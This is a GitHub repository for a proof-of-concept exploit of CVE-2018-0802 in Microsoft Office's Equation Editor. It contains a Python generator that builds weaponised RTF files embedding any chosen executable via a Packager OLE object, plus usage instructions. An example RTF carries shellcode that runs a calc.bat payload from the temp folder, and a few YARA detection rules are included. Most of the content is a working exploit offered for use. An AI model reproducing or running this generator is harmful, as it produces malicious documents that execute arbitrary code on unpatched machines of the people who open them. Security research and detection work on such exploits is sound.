├── yara
    ├── rtf_CVE_2018_0802.yara
    ├── strip_keycodes.py
    └── rtf_CVE_2017_11882.yara
├── Readme.md
├── example
    └── example.rtf
└── packager_exec_CVE-2018-0802.py


/yara/rtf_CVE_2018_0802.yara:
--------------------------------------------------------------------------------
 1 | rule rtf_CVE_2018_0802 {
 2 | meta:
 3 | 	author = "Rich Warren"
 4 | 	ref = "http://www.freebuf.com/vuls/159789.html"
 5 |  strings:
 6 | 	$header_rtf = "{\\rt" ascii nocase
 7 |  	$equation = { 45 71 75 61 74 69 6F 6E 2E 33 }
 8 |  	$header_and_shellcode = /03010[0,1][0-9a-fA-F]{308,310}2500/ ascii nocase
 9 |  condition:
10 |  	$header_rtf at 0 and all of them
11 |  }


--------------------------------------------------------------------------------
/yara/strip_keycodes.py:
--------------------------------------------------------------------------------
 1 | import argparse, re
 2 | 
 3 | if __name__ == '__main__':
 4 |     parser = argparse.ArgumentParser(description="Strips keycodes from rtf data (used for obfuscation in many maldocs).")
 5 |     parser.add_argument("-i", "--input", help="Input file", required=True)
 6 |     parser.add_argument('-o', "--output", help="Output file", required=True)
 7 | 
 8 |     args = parser.parse_args()
 9 | 
10 |     with open(args.input, 'r') as f:
11 |     	in_rtf = f.read()
12 | 
13 |     with open(args.output, 'w') as f:
14 |         f.write(re.sub(r"(?:\{\\\*\\keycode[0-9]+ {1})([0-9a-fA-F]+)\}",r"\1", in_rtf))
15 |     
16 |     print "[+] Done!"


--------------------------------------------------------------------------------
/yara/rtf_CVE_2017_11882.yara:
--------------------------------------------------------------------------------
 1 | rule packager_cve2017_11882 {
 2 |     meta:
 3 |         author = "Rich Warren"
 4 |         description = "Attempts to exploit CVE-2017-11882 using Packager"
 5 |         reference = "https://github.com/rxwx/CVE-2017-11882/blob/master/packager_exec_CVE-2017-11882.py"
 6 |         score = 60
 7 |     strings:
 8 | 	    $header_rtf = "{\\rt" nocase
 9 | 		
10 |         $font = { 30 61 30 31 30 38 35 61  35 61 }
11 |         $equation = { 45 71 75 61 74 69 6F 6E 2E 33 }
12 |         $package = { 50 61 63 6b 61 67 65 }
13 |         $header_and_shellcode = /03010[0,1][0-9a-fA-F]{108}00/ ascii nocase
14 |     condition:
15 |         all of them and $header_rtf at 0
16 | }


--------------------------------------------------------------------------------
/Readme.md:
--------------------------------------------------------------------------------
 1 | # CVE-2018-0802
 2 | 
 3 | - CVE-2018-08022:
 4 | https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0802
 5 | 
 6 | - MITRE CVE-2018-0802:
 7 | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0802
 8 | 
 9 | - 0patch exploitation and patch video:
10 | https://www.youtube.com/watch?v=XU-U4K270Z4
11 | 
12 | - Qihoo 360 blog post
13 | http://www.freebuf.com/vuls/159789.html
14 | 
15 | - Checkpoint blog (brute-force ASLR bypass)
16 | https://research.checkpoint.com/another-office-equation-rce-vulnerability
17 | 
18 | # packager_exec CVE-2018-0802
19 | 
20 | This repo contains a Proof of Concept exploit for CVE-2018-0802. To get round the limited command length allowed, the exploit uses the Packager OLE object to drop an embedded payload into the %TMP% directory, and then executes the file using a short command via a WinExec call, such as:  ```cmd.exe /c%TMP%\file.exe```.
21 | 
22 | 
23 | ## Usage
24 | 
25 | ```python
26 | packager_exec_CVE-2018-0802.py -e executable_path -o output_file_name
27 | ```
28 | 
29 | Add the -d option to exploit both CVE-2017-11882 and CVE-2018-0802 in the same document.
30 | 
31 | ## Detection
32 | 
33 | I've added a Yara rule to detect this specific variant of the exploit as used itw. Please note that this can be easily bypassed and may need tweaking. Happy to take PR's for better ones ;)
34 | 
35 | # Greetz
36 | 
37 | This exploit is based heavily on the prior work already done by Embedi on CVE-2017-11882. I take no credit for the great work already achieved by those mentioned here.
38 | 
39 | Kudos also goes out to the many discoverers:
40 | 
41 | - bee13oy of Qihoo 360 Vulcan Team
42 | - zhouat of Qihoo 360 Vulcan Team
43 | - Liang Yin of Tencent PC Manager
44 | - Luka Treiber of 0patch Team - ACROS Security
45 | - Netanel Ben Simon and Omer Gull of Check Point Software Technologies
46 | - Yang Kang, Ding Maoyin and Song Shenlei of Qihoo 360 Core Security (@360CoreSec)
47 | - Yuki Chen of Qihoo 360 Vulcan Team
48 | - Zhiyuan Zheng
49 | 
50 | # Sample exploit for CVE-2018-0802 (starting calc.exe as payload)
51 | 
52 | `example` folder holds an .rtf file which exploits CVE-2018-0802 vulnerability and runs calculator in the system.


--------------------------------------------------------------------------------
/example/example.rtf:
--------------------------------------------------------------------------------
 1 | {\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Calibri;}}
 2 | {\*\generator Riched20 6.3.9600}\viewkind4\uc1
 3 | \pard\sa200\sl276\slmult1\f0\fs22\lang9{\object\objemb\objw1\objh1{\*\objclass Package}{\*\objdata 0105000002000000080000005061636b616765000000000000000000b8000000020063616c632e62617400433a5c66616b65706174685c63616c632e626174000000030015000000433a5c66616b65706174685c63616c632e626174000b00000063616c632e657865200d0a1400000043003a005c00660061006b00650070006100740068005c00630061006c0063002e0062006100740008000000630061006c0063002e006200610074001400000043003a005c00660061006b00650070006100740068005c00630061006c0063002e006200610074000105000000000000}}{\object\objemb\objupdate{\*\objclass Equation.3}\objw380\objh260{\*\objdata 01050000020000000B0000004571756174696F6E2E33000000000000000000000E0000D0CF11E0A1B11AE1000000000000000000000000000000003E000300FEFF0900060000000000000000000000010000000100000000000000001000000200000001000000FEFFFFFF0000000000000000FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFDFFFFFF04000000FEFFFFFF05000000FEFFFFFFFEFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF52006F006F007400200045006E00740072007900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000016000500FFFFFFFFFFFFFFFF0200000002CE020000000000C000000000000046000000000000000000000000B024837CC473D30103000000C00300000000000001004F006C00650000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000A000201FFFFFFFFFFFFFFFFFFFFFFFF000000000000000000000000000000000000000000000000000000000000000000000000000000001400000000000000010043006F006D0070004F0062006A00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000120002010100000004000000FFFFFFFF00000000000000000000000000000000000000000000000000000000000000000000000001000000660000000000000003004F0062006A0049006E0066006F0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000012000201FFFFFFFFFFFFFFFFFFFFFFFF000000000000000000000000000000000000000000000000000000000000000000000000030000000600000000000000FEFFFFFF02000000FEFFFFFFFEFFFFFF0500000006000000070000000800000009000000FEFFFFFFFEFFFFFF0C0000000D0000000E000000FEFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF010000020000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100FEFF030A0000FFFFFFFF02CE020000000000C000000000000046170000004D6963726F736F6674204571756174696F6E20332E30000C0000004453204571756174696F6E000B0000004571756174696F6E2E3300F439B271000000000000000000000000000000000000000000000000000000000000000000000000000000000300040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFF030000000400000001000000FFFFFFFF01000000000000007C010000040100003C0100000100090000039E00000002001C00000000000500000009020000000005000000020101000000050000000102FFFFFF00050000002E0118000000050000000B0200000000050000000C02A00160021200000026060F001A00FFFFFFFF000010000000C0FFFFFFC6FFFFFF20020000660100000B00000026060F000C004D61746854797065000020001C000000FB0280FE0000000000009001000000000402001054696D6573204E657720526F6D616E00FEFFFFFF5F2D0A6500000A0000000000040000002D01000009000000320A6001100003000000202002004F006C0065005000720065007300300030003000000000000000000000000000000000000000000000000000000000000000000000000000000000000000180002000300000005000000FFFFFFFF000000000000000000000000000000000000000000000000000000000000000000000000040000007E010000000000005200690063006800450064006900740046006C0061006700730000000000000000000000000000000000000000000000000000000000000000000000000000001C000201FFFFFFFF06000000FFFFFFFF0000000000000000000000000000000000000000000000000000000000000000000000000A0000000C000000000000004500710075006100740069006F006E0020004E00610074006900760065000000000000000000000000000000000000000000000000000000000000000000000020000200FFFFFFFFFFFFFFFFFFFFFFFF0000000000000000000000000000000000000000000000000000000000000000000000000B000000C5000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000020000A00000026060F000A00FFFFFFFF0100000000001C000000FB021000070000000000BC02000000000102022253797374656D000048008A0100000A000600000048008A01FFFFFFFF6CE21800040000002D01010004000000F00100000300000000000000000000000000000000000000000000004E414E49000000000000010000000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001C00000002009EC4A900000000000000C8A75C00C4EE5B0000000000030100030A0A08000133C0508D44245250EB7F636d642e657865202f63202574656d70255c63616c632e6261742020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202026908B44242C662D51A8FFE025000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001050000050000000D0000004D45544146494C4550494354007C010000FCFEFFFF4401000008007C01040100000100090000039E00000002001C00000000000500000009020000000005000000020101000000050000000102FFFFFF00050000002E0118000000050000000B0200000000050000000C02A00160021200000026060F001A00FFFFFFFF000010000000C0FFFFFFC6FFFFFF20020000660100000B00000026060F000C004D61746854797065000020001C000000FB0280FE0000000000009001000000000402001054696D6573204E657720526F6D616E00FEFFFFFF5F2D0A6500000A0000000000040000002D01000009000000320A6001100003000000202020000A00000026060F000A00FFFFFFFF0100000000001C000000FB021000070000000000BC02000000000102022253797374656D000048008A0100000A000600000048008A01FFFFFFFF6CE21800040000002D01010004000000F0010000030000000000
 4 | }{\result{\pict{\*\picprop}\wmetafile8\picw380\pich260\picwgoal380\pichgoal260
 5 | 0100090000039e00000002001c0000000000050000000902000000000500000002010100000005
 6 | 0000000102ffffff00050000002e0118000000050000000b0200000000050000000c02a0016002
 7 | 1200000026060f001a00ffffffff000010000000c0ffffffc6ffffff20020000660100000b0000
 8 | 0026060f000c004d61746854797065000020001c000000fb0280fe000000000000900100000000
 9 | 0402001054696d6573204e657720526f6d616e00feffffff5f2d0a6500000a0000000000040000
10 | 002d01000009000000320a6001100003000000313131000a00000026060f000a00ffffffff0100
11 | 000000001c000000fb021000070000000000bc02000000000102022253797374656d000048008a
12 | 0100000a000600000048008a01ffffffff6ce21800040000002d01010004000000f00100000300
13 | 00000000
14 | }}}
15 | \par}
16 | 


--------------------------------------------------------------------------------
/packager_exec_CVE-2018-0802.py:
--------------------------------------------------------------------------------
  1 | import argparse
  2 | import os
  3 | import struct
  4 | 
  5 | class Package(object):
  6 |     """
  7 |     Packager spec based on:
  8 |     https://phishme.com/rtf-malware-delivery/
  9 |     
 10 |     Dropping method by Haifei Li: 
 11 |     https://securingtomorrow.mcafee.com/mcafee-labs/dropping-files-temp-folder-raises-security-concerns/
 12 |     Found being used itw by @MalwareParty:
 13 |     https://twitter.com/MalwareParty/status/943861021260861440
 14 |     """
 15 |     def __init__(self, filename):
 16 |         self.filename = os.path.basename(filename)
 17 |         self.fakepath = 'C:\\fakepath\\{}'.format(self.filename)
 18 | 
 19 |         self.orgpath = self.fakepath
 20 |         self.datapath = self.fakepath
 21 | 
 22 |         with open(filename,'rb') as f:
 23 |             self.data = f.read()
 24 | 
 25 |         self.OBJ_HEAD = r"{\object\objemb\objw1\objh1{\*\objclass Package}{\*\objdata "
 26 |         self.OBJ_TAIL = r"0105000000000000}}"
 27 | 
 28 |     def get_object_header(self):
 29 |         OLEVersion = '01050000'
 30 |         FormatID = '02000000'
 31 |         ClassName = 'Package'
 32 |         szClassName = struct.pack("<I", len(ClassName) + 1).encode('hex')
 33 |         szPackageData = struct.pack("<I", len(self.get_package_data())/2).encode('hex')
 34 | 
 35 |         return ''.join([
 36 |             OLEVersion,
 37 |             FormatID,
 38 |             szClassName,
 39 |             ClassName.encode('hex') + '00',
 40 |             '00000000',
 41 |             '00000000',
 42 |             szPackageData,
 43 |         ])
 44 | 
 45 |     def get_package_data(self):  
 46 |         StreamHeader = '0200'
 47 |         Label = self.filename.encode('hex') + '00'
 48 |         OrgPath = self.orgpath.encode('hex') + '00'
 49 |         UType = '00000300'
 50 |         DataPath = self.datapath.encode('hex') + '00'
 51 |         DataPathLen = struct.pack("<I", len(self.datapath)+1).encode('hex')
 52 |         DataLen = struct.pack("<I", len(self.data)).encode('hex')
 53 |         Data = self.data.encode('hex')
 54 |         OrgPathWLen = struct.pack("<I", len(self.datapath)).encode('hex')
 55 |         OrgPathW = self.datapath.encode('utf-16le').encode('hex')
 56 |         LabelLen = struct.pack("<I", len(self.filename)).encode('hex')
 57 |         LabelW = self.filename.encode('utf-16le').encode('hex')
 58 |         DefPathWLen = struct.pack("<I", len(self.orgpath)).encode('hex')
 59 |         DefPathW = self.orgpath.encode('utf-16le').encode('hex')
 60 | 
 61 |         return ''.join([
 62 |             StreamHeader,
 63 |             Label,
 64 |             OrgPath,
 65 |             UType,
 66 |             DataPathLen,
 67 |             DataPath,
 68 |             DataLen,
 69 |             Data,
 70 |             OrgPathWLen,
 71 |             OrgPathW,
 72 |             LabelLen,
 73 |             LabelW,
 74 |             DefPathWLen,
 75 |             DefPathW,
 76 |         ])
 77 | 
 78 |     def build_package(self):
 79 |         return self.OBJ_HEAD + self.get_object_header() + self.get_package_data() + self.OBJ_TAIL
 80 | 
 81 | 
 82 | 
 83 | RTF_HEADER = R"""{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Calibri;}}
 84 | {\*\generator Riched20 6.3.9600}\viewkind4\uc1
 85 | \pard\sa200\sl276\slmult1\f0\fs22\lang9"""
 86 | 
 87 | 
 88 | RTF_TRAILER = R"""\par}
 89 | """
 90 | 
 91 | 
 92 | OBJECT_HEADER = R"""{\object\objemb\objupdate{\*\objclass Equation.3}\objw380\objh260{\*\objdata """
 93 | 
 94 | 
 95 | OBJECT_TRAILER = R"""
 96 | }{\result{\pict{\*\picprop}\wmetafile8\picw380\pich260\picwgoal380\pichgoal260
 97 | 0100090000039e00000002001c0000000000050000000902000000000500000002010100000005
 98 | 0000000102ffffff00050000002e0118000000050000000b0200000000050000000c02a0016002
 99 | 1200000026060f001a00ffffffff000010000000c0ffffffc6ffffff20020000660100000b0000
100 | 0026060f000c004d61746854797065000020001c000000fb0280fe000000000000900100000000
101 | 0402001054696d6573204e657720526f6d616e00feffffff5f2d0a6500000a0000000000040000
102 | 002d01000009000000320a6001100003000000313131000a00000026060f000a00ffffffff0100
103 | 000000001c000000fb021000070000000000bc02000000000102022253797374656d000048008a
104 | 0100000a000600000048008a01ffffffff6ce21800040000002d01010004000000f00100000300
105 | 00000000
106 | }}}
107 | """
108 | 
109 | 
110 | OBJDATA_TEMPLATE_0802 = R"""
111 | 01050000020000000B0000004571756174696F6E2E33000000000000000000000E0000D0CF11E0A1
112 | B11AE1000000000000000000000000000000003E000300FEFF090006000000000000000000000001
113 | 0000000100000000000000001000000200000001000000FEFFFFFF0000000000000000FFFFFFFFFF
114 | FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
115 | FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
116 | FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
117 | FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
118 | FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
119 | FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
120 | FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
121 | FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
122 | FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
123 | FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
124 | FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFDFFFFFF04000000FEFFFFFF05
125 | 000000FEFFFFFFFEFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
126 | FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
127 | FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
128 | FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
129 | FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
130 | FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
131 | FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
132 | FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
133 | FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
134 | FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
135 | FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
136 | FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
137 | FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF52006F006F007400200045006E0074007200790000
138 | 00000000000000000000000000000000000000000000000000000000000000000000000000000000
139 | 00000016000500FFFFFFFFFFFFFFFF0200000002CE020000000000C0000000000000460000000000
140 | 00000000000000B024837CC473D30103000000C00300000000000001004F006C0065000000000000
141 | 00000000000000000000000000000000000000000000000000000000000000000000000000000000
142 | 00000000000000000000000A000201FFFFFFFFFFFFFFFFFFFFFFFF00000000000000000000000000
143 | 0000000000000000000000000000000000000000000000000000001400000000000000010043006F
144 | 006D0070004F0062006A000000000000000000000000000000000000000000000000000000000000
145 | 00000000000000000000000000000000000000120002010100000004000000FFFFFFFF0000000000
146 | 00000000000000000000000000000000000000000000000000000000000000010000006600000000
147 | 00000003004F0062006A0049006E0066006F00000000000000000000000000000000000000000000
148 | 00000000000000000000000000000000000000000000000000000012000201FFFFFFFFFFFFFFFFFF
149 | FFFFFF00000000000000000000000000000000000000000000000000000000000000000000000003
150 | 0000000600000000000000FEFFFFFF02000000FEFFFFFFFEFFFFFF05000000060000000700000008
151 | 00000009000000FEFFFFFFFEFFFFFF0C0000000D0000000E000000FEFFFFFFFFFFFFFFFFFFFFFFFF
152 | FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
153 | FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
154 | FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
155 | FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
156 | FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
157 | FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
158 | FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
159 | FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
160 | FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
161 | FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
162 | FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
163 | FFFFFF01000002000000000000000000000000000000000000000000000000000000000000000000
164 | 0000000000000000000000000000000000000000000000000000000100FEFF030A0000FFFFFFFF02
165 | CE020000000000C000000000000046170000004D6963726F736F6674204571756174696F6E20332E
166 | 30000C0000004453204571756174696F6E000B0000004571756174696F6E2E3300F439B271000000
167 | 00000000000000000000000000000000000000000000000000000000000000000000000000030004
168 | 00000000000000000000000000000000000000000000000000000000000000000000000000000000
169 | 00000000000000000000000000000000000000FFFFFFFF030000000400000001000000FFFFFFFF01
170 | 000000000000007C010000040100003C0100000100090000039E00000002001C0000000000050000
171 | 0009020000000005000000020101000000050000000102FFFFFF00050000002E0118000000050000
172 | 000B0200000000050000000C02A00160021200000026060F001A00FFFFFFFF000010000000C0FFFF
173 | FFC6FFFFFF20020000660100000B00000026060F000C004D61746854797065000020001C000000FB
174 | 0280FE0000000000009001000000000402001054696D6573204E657720526F6D616E00FEFFFFFF5F
175 | 2D0A6500000A0000000000040000002D01000009000000320A6001100003000000202002004F006C
176 | 00650050007200650073003000300030000000000000000000000000000000000000000000000000
177 | 00000000000000000000000000000000000000180002000300000005000000FFFFFFFF0000000000
178 | 00000000000000000000000000000000000000000000000000000000000000040000007E01000000
179 | 0000005200690063006800450064006900740046006C006100670073000000000000000000000000
180 | 0000000000000000000000000000000000000000000000000000001C000201FFFFFFFF06000000FF
181 | FFFFFF0000000000000000000000000000000000000000000000000000000000000000000000000A
182 | 0000000C000000000000004500710075006100740069006F006E0020004E00610074006900760065
183 | 000000000000000000000000000000000000000000000000000000000000000000000020000200FF
184 | FFFFFFFFFFFFFFFFFFFFFF0000000000000000000000000000000000000000000000000000000000
185 | 000000000000000B000000C500000000000000000000000000000000000000000000000000000000
186 | 00000000000000000000000000000000000000000000000000000000000000000000000000000000
187 | 00000000000000FFFFFFFFFFFFFFFFFFFFFFFF000000000000000000000000000000000000000000
188 | 00000000000000000000000000000000000000000000000000000020000A00000026060F000A00FF
189 | FFFFFF0100000000001C000000FB021000070000000000BC02000000000102022253797374656D00
190 | 0048008A0100000A000600000048008A01FFFFFFFF6CE21800040000002D01010004000000F00100
191 | 000300000000000000000000000000000000000000000000004E414E490000000000000100000000
192 | 00000001000000000000000000000000000000000000000000000000000000000000000000000000
